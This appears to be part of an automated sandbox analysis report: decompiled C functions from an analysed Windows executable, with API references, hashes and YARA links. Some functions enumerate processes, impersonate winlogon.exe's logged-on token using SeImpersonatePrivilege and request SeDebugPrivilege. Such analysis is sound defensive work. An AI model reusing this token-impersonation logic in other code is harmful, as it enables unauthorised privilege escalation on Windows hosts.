                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                            • API String ID: 1529661771-70141382
                                                                                                                            • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                            • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                            • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                            • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2827331108-0
                                                                                                                            • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                            • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                            • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                            • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                            0x00401f04
                                                                                                                            0x00401f20
                                                                                                                            0x00401f27
                                                                                                                            0x00401f38
                                                                                                                            0x00401f3f
                                                                                                                            0x00401f4e
                                                                                                                            0x00401f54
                                                                                                                            0x00401f5f
                                                                                                                            0x00401f6e
                                                                                                                            0x00401f72
                                                                                                                            0x00401f77
                                                                                                                            0x00401f78
                                                                                                                            0x00401f91
                                                                                                                            0x00401f7a
                                                                                                                            0x00401f88
                                                                                                                            0x00401f8e
                                                                                                                            0x00401f8e
                                                                                                                            0x00401fa6
                                                                                                                            0x00401fa9
                                                                                                                            0x00401fae
                                                                                                                            0x00401fb0
                                                                                                                            0x00401fb2
                                                                                                                            0x00401fb9
                                                                                                                            0x00401fc2
                                                                                                                            0x00401fca
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fd7
                                                                                                                            0x00401fd7
                                                                                                                            0x00401fe3

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00401F27
                                                                                                                            • memset.MSVCRT ref: 00401F3F
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                            • wcslen.MSVCRT ref: 00401F5A
                                                                                                                            • wcslen.MSVCRT ref: 00401F69
                                                                                                                            • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                              • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                              • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                            • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                            • API String ID: 3867304300-2177360481
                                                                                                                            • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                            • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                            • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                            • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                            0x0040955f
                                                                                                                            0x00409566
                                                                                                                            0x0040956e
                                                                                                                            0x00409576
                                                                                                                            0x00409586
                                                                                                                            0x00409586
                                                                                                                            0x0040956e
                                                                                                                            0x00409592
                                                                                                                            0x004095aa
                                                                                                                            0x00409594
                                                                                                                            0x004095a3
                                                                                                                            0x004095a6
                                                                                                                            0x004095a6

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                            • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                                            • API String ID: 1714573020-3385500049
                                                                                                                            • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                            • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                            • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                            • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                            0x00402f3a
                                                                                                                            0x00402f51
                                                                                                                            0x00402f60
                                                                                                                            0x00402f6f
                                                                                                                            0x00402f78
                                                                                                                            0x00402f7a
                                                                                                                            0x00402f7a
                                                                                                                            0x00402f8a
                                                                                                                            0x00402f8f
                                                                                                                            0x00402f94
                                                                                                                            0x00402f99
                                                                                                                            0x00402f9e
                                                                                                                            0x00402f9f
                                                                                                                            0x00402fad
                                                                                                                            0x00402fb2
                                                                                                                            0x00402fb2
                                                                                                                            0x00402fbd
                                                                                                                            0x00402fc5

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00402F51
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                            • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                            • wcscat.MSVCRT ref: 00402F8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                            • String ID: .cfg
                                                                                                                            • API String ID: 776488737-3410578098
                                                                                                                            • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                            • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                            • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                            • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 35%
                                                                                                                            			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                            0x00409ddc
                                                                                                                            0x00409de4
                                                                                                                            0x00409df0
                                                                                                                            0x00409df5
                                                                                                                            0x00409df6
                                                                                                                            0x00409e03
                                                                                                                            0x00409e05
                                                                                                                            0x00409e06
                                                                                                                            0x00409e3b
                                                                                                                            0x00409e5d
                                                                                                                            0x00409e6a
                                                                                                                            0x00409e73
                                                                                                                            0x00409e75
                                                                                                                            0x00409e08
                                                                                                                            0x00409e08
                                                                                                                            0x00409e19
                                                                                                                            0x00409e37
                                                                                                                            0x00409e37
                                                                                                                            0x00409e81

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00409E08
                                                                                                                              • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                              • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                            • memset.MSVCRT ref: 00409E3B
                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0040C4E8,?,00002000,?), ref: 00409E5D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1127616056-0
                                                                                                                            • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                            • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                            • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                            • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                            0x00404951
                                                                                                                            0x00404952
                                                                                                                            0x00404956
                                                                                                                            0x004049a1
                                                                                                                            0x00404958
                                                                                                                            0x00404959
                                                                                                                            0x0040495b
                                                                                                                            0x0040495b
                                                                                                                            0x0040495f
                                                                                                                            0x00404961
                                                                                                                            0x00404963
                                                                                                                            0x0040496d
                                                                                                                            0x00404975
                                                                                                                            0x00404977
                                                                                                                            0x0040497b
                                                                                                                            0x00404985
                                                                                                                            0x0040498a
                                                                                                                            0x0040498e
                                                                                                                            0x00404993
                                                                                                                            0x0040499d
                                                                                                                            0x0040499d

                                                                                                                            APIs
                                                                                                                            • malloc.MSVCRT ref: 0040496D
                                                                                                                            • memcpy.MSVCRT ref: 00404985
                                                                                                                            • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                            • String ID: W@
                                                                                                                            • API String ID: 3056473165-1729568415
                                                                                                                            • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                            • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                            • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                            • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                            0x0040543f
                                                                                                                            0x00405456
                                                                                                                            0x00405462
                                                                                                                            0x00405467
                                                                                                                            0x0040546d
                                                                                                                            0x00405478
                                                                                                                            0x00405489
                                                                                                                            0x0040548d
                                                                                                                            0x00000000
                                                                                                                            0x00405492
                                                                                                                            0x00405496

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                              • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                              • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                            • wcscat.MSVCRT ref: 00405478
                                                                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3725422290-0
                                                                                                                            • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                            • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                            • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                            • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                              • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                              • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                              • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4232544981-0
                                                                                                                            • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                            • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                            • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                            • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                            0x00408f4c
                                                                                                                            0x00408f57
                                                                                                                            0x00408f60
                                                                                                                            0x00408f62
                                                                                                                            0x00408f67
                                                                                                                            0x00408f67
                                                                                                                            0x00408f71

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                              • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 187924719-0
                                                                                                                            • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                            • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                            • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                            • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                            0x004098fa
                                                                                                                            0x004098fc
                                                                                                                            0x00409901
                                                                                                                            0x00409907
                                                                                                                            0x00000000
                                                                                                                            0x0040991c
                                                                                                                            0x00409918
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$FileModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3859505661-0
                                                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

